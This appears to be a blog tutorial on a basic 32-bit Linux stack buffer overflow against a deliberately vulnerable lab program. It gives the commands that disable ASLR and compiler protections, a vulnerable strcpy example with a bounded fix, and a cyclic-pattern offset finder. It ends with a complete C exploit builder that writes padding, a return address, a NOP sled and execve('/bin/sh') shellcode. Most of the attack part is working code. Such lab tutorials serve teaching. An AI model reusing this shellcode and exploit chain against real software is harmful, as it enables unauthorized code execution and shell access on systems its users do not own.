How To Do a Basic Buffer Overflow Attack
Stack-based buffer overflow
Before doing the buffer overflow we need to disable the protections the OS and the compiler put around the stack: ASLR, the stack canary, NX (the non-executable stack) and PIE. To disable ASLR system-wide (until the next reboot), run

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

and when compiling the target, turn off the remaining protections and build a 32-bit binary:

gcc vuln.c -o vuln -fno-stack-protector -z execstack -no-pie -m32

-fno-stack-protector removes the stack canary, -z execstack makes the stack executable (no NX), -no-pie gives the binary fixed load addresses, and -m32 produces a 32-bit executable, which is why we work with the EIP register below. Between them these two commands disable every protection that would otherwise stop a simple overflow.
Simple buffer overflow code
This is a simple program that is vulnerable to a buffer overflow. main() takes an argument from the command line and passes it to the vuln function. Inside that function the argument is copied into a fixed-size local buffer with strcpy(), which copies until it reaches the terminating NUL byte and never checks the size of the destination, so we can write more data than the buffer holds and overwrite what sits above it on the stack: the saved EBP and the saved return address.
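The post does not reproduce its vuln.c, so here is an added example (not the post's own code) of the kind of program it describes, next to a bounded version of the same function. The buffer size of 256 and the function names are assumptions; build the vulnerable variant with the gcc flags given above to reproduce the crash.

```c
/* Added example, not the write-up's vuln.c: main() -> vuln_func() ->
 * strcpy() into a fixed stack buffer, plus a bounded version of the
 * same copy. BUF_SIZE and the names are assumptions.
 * Build as the post does:
 *   gcc vuln.c -o vuln -fno-stack-protector -z execstack -no-pie -m32
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 256   /* assumed; the post does not state the size */

/* Vulnerable: strcpy() copies until the NUL in src, so an argument longer
 * than BUF_SIZE-1 bytes runs past buf over the saved EBP and the saved
 * return address. Never call this with input you do not control. */
void vuln_func(const char *src)
{
    char buf[BUF_SIZE];
    strcpy(buf, src);                 /* no length check: the bug */
    printf("copied %zu bytes\n", strlen(buf));
}

/* Fixed: copy at most BUF_SIZE-1 bytes and always NUL-terminate.
 * Returns 1 if the input had to be truncated, 0 otherwise, so the caller
 * can reject over-long input instead of silently cutting it short. */
int vuln_func_fixed(const char *src)
{
    char buf[BUF_SIZE];
    size_t n = strlen(src);
    int truncated = n >= BUF_SIZE;
    size_t copy = truncated ? BUF_SIZE - 1 : n;
    memcpy(buf, src, copy);
    buf[copy] = '\0';
    printf("copied %zu bytes\n", strlen(buf));
    return truncated;
}

/* Helper: feed the bounded version a string of len 'A's and report
 * whether it had to truncate. Returns -1 on allocation failure. */
int overflow_attempt_truncates(size_t len)
{
    char *s = malloc(len + 1);
    if (!s) return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    int r = vuln_func_fixed(s);
    free(s);
    return r;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <string>\n", argv[0]);
        return 1;
    }
    vuln_func(argv[1]);   /* ./vuln $(cat exploit) */
    return 0;
}
```

With the vulnerable build, any argument of 256 bytes or more corrupts the stack; the fixed version keeps the copy inside the buffer and reports the truncation instead.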
Overflowing the buffer
So when we run the program with an input longer than the buffer, it crashes with a segmentation fault. That means the buffer has overflowed: our data overwrote the saved return address and the CPU tried to continue at an address that does not exist.
Now let's find out exactly how many characters we need to reach the saved return address.
To do that I am going to use an offset pattern generated by an online pattern tool: a cyclic string in which every 4-byte window is unique, so whatever ends up in EIP can be mapped back to one position in the input.
So I wrote a little Python script to print that pattern into a file called exploit, ready to be passed to the program.
Now I am going to run the program under GDB to see what happens to the registers when it crashes.
r $(cat exploit) runs the program with the contents of the exploit file as its argument.
Now you can see the segmentation fault, and EIP has been replaced by the value 0x6a413969. x86 is little-endian, so the bytes that were loaded into EIP sat in the pattern as 69 39 41 6a, the characters "i9Aj"; searching for those characters (or for the hex value) in the pattern gives us the offset of the saved return address, i.e. how many bytes of padding we need.
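As an added example (not the post's Python script or the online tool), here is the pattern generator and the offset lookup in one C program. It assumes the tool used the common Metasploit-style pattern (Aa0Aa1Aa2...); with that pattern the EIP value from the post, 0x6a413969, maps to offset 268.

```c
/* Added example, not from the post: a Metasploit-style cyclic pattern
 * generator and an offset finder. That 0x6a413969 lands at offset 268
 * assumes the post's online tool used this same Aa0Aa1... pattern. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Fill out[0..len-1] with the cyclic pattern and NUL-terminate it
 * (out needs len+1 bytes). Each 3-byte unit is Upper, lower, digit with
 * the digit rolling fastest, so every 4-byte window is unique for the
 * first 20280 bytes. */
void pattern_create(char *out, size_t len)
{
    size_t i = 0;
    for (char u = 'A'; u <= 'Z' && i < len; u++)
        for (char l = 'a'; l <= 'z' && i < len; l++)
            for (char d = '0'; d <= '9' && i < len; d++) {
                char unit[3] = { u, l, d };
                for (int k = 0; k < 3 && i < len; k++)
                    out[i++] = unit[k];
            }
    out[i] = '\0';
}

/* Return the offset of the 4 bytes that became EIP, or -1 if absent.
 * x86 is little-endian: the register value 0x6a413969 was loaded from
 * the bytes 69 39 41 6a, i.e. "i9Aj", so the needle is built low byte
 * first. */
long pattern_offset(const char *pattern, size_t len, uint32_t eip)
{
    unsigned char needle[4] = {
        eip & 0xff, (eip >> 8) & 0xff, (eip >> 16) & 0xff, (eip >> 24) & 0xff
    };
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pattern + i, needle, 4) == 0)
            return (long)i;
    return -1;
}

/* Convenience: build a pattern of len bytes and look an EIP value up. */
long offset_for(uint32_t eip, size_t len)
{
    char *pat = malloc(len + 1);
    if (!pat) return -1;
    pattern_create(pat, len);
    long off = pattern_offset(pat, len, eip);
    free(pat);
    return off;
}

int main(int argc, char **argv)
{
    size_t len = argc > 1 ? strtoul(argv[1], NULL, 10) : 500;
    if (argc > 2) {
        /* ./pattern 500 0x6a413969  prints the offset */
        uint32_t eip = (uint32_t)strtoul(argv[2], NULL, 16);
        printf("%ld\n", offset_for(eip, len));
    } else {
        /* ./pattern 500 > exploit, then in gdb: r $(cat exploit) */
        char *pat = malloc(len + 1);
        if (!pat) return 1;
        pattern_create(pat, len);
        fputs(pat, stdout);
        free(pat);
    }
    return 0;
}
```

If the lookup returns -1, the value in EIP did not come from the pattern (the pattern was too short, or the crash corrupted something other than the return address), so check the pattern length before trusting an offset.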
Let's write the exploit
First we want to make sure that we can put a chosen value into EIP: pad the input with exactly that many bytes and follow them with BBBB, then run it under gdb again.
EIP now reads 0x42424242 (BBBB), so we control the return address. Next we replace it with a real memory address that will land us in a shell.
Here we put a breakpoint in vuln_func() and inspect the stack to find an address inside the NOP sled, the run of no-operation bytes we place in front of the shellcode. In this run that address is 0xffffcd70; we put it where BBBB was, written little-endian, and when we run the program in gdb we get a shell. One caveat: the stack addresses gdb shows can differ slightly from a run outside gdb, because the environment and argv[0] change the stack layout; that is what the NOP sled is for, and a longer sled gives more room for error.
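As an added example (not the post's exploit script), the following program writes the final payload to a file named exploit in the layout the post describes: padding up to the saved return address, the NOP-sled address 0xffffcd70 in little-endian order, a NOP sled, then shellcode. The offset 268 is what the standard Aa0 pattern gives for the EIP value 0x6a413969 (an assumption about the tool used), and the shellcode is the common 32-bit Linux execve("/bin/sh") stub, not one taken from the post.

```c
/* Added example, not the post's exploit: builds the payload file that
 * gdb passes with r $(cat exploit). OFFSET assumes the Aa0 pattern;
 * RET_ADDR is the NOP-sled address found in gdb; the shellcode is the
 * usual 32-bit Linux execve("/bin/sh") stub. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

#define OFFSET   268          /* bytes before the saved return address */
#define RET_ADDR 0xffffcd70u  /* address inside the NOP sled, from gdb */
#define SLED_LEN 100          /* 0x90 sled; absorbs small address error */

static const unsigned char shellcode[] =
    "\x31\xc0"              /* xor eax,eax           */
    "\x99"                  /* cdq: edx = 0 (envp)   */
    "\x50"                  /* push eax (NUL)        */
    "\x68\x2f\x2f\x73\x68"  /* push "//sh"           */
    "\x68\x2f\x62\x69\x6e"  /* push "/bin"           */
    "\x89\xe3"              /* mov ebx,esp (path)    */
    "\x50"                  /* push eax              */
    "\x53"                  /* push ebx              */
    "\x89\xe1"              /* mov ecx,esp (argv)    */
    "\xb0\x0b"              /* mov al,11 (execve)    */
    "\xcd\x80";             /* int 0x80              */
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

size_t payload_size(void) { return OFFSET + 4 + SLED_LEN + SHELLCODE_LEN; }

/* Fill out (payload_size() bytes) and return the length written. The
 * address goes low byte first because x86 is little-endian, so that the
 * bytes read back as 0xffffcd70 when they are loaded into EIP. */
size_t build_payload(unsigned char *out, uint32_t ret)
{
    size_t i = 0;
    memset(out, 'A', OFFSET);                    i += OFFSET;
    out[i++] = ret & 0xff;
    out[i++] = (ret >> 8) & 0xff;
    out[i++] = (ret >> 16) & 0xff;
    out[i++] = (ret >> 24) & 0xff;
    memset(out + i, 0x90, SLED_LEN);             i += SLED_LEN;
    memcpy(out + i, shellcode, SHELLCODE_LEN);   i += SHELLCODE_LEN;
    return i;
}

/* The payload travels through argv, which is a C string: a NUL byte
 * anywhere in it would cut the argument short. Returns 1 if NUL-free. */
int payload_is_argv_safe(const unsigned char *p, size_t n)
{
    return memchr(p, 0, n) == NULL;
}

int main(void)
{
    unsigned char *p = malloc(payload_size());
    if (!p) return 1;
    size_t n = build_payload(p, RET_ADDR);
    if (!payload_is_argv_safe(p, n)) {
        fprintf(stderr, "payload contains a NUL byte; pick another address\n");
        return 1;
    }
    FILE *f = fopen("exploit", "wb");
    if (!f) return 1;
    fwrite(p, 1, n, f);
    fclose(f);
    free(p);
    return 0;
}
```

The NUL check matters because the payload is delivered as a command-line argument: an address such as 0x08040000 could never be passed this way, while 0xffffcd70 contains no zero byte. Run the generator, then in gdb: r $(cat exploit).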
See you in another blog!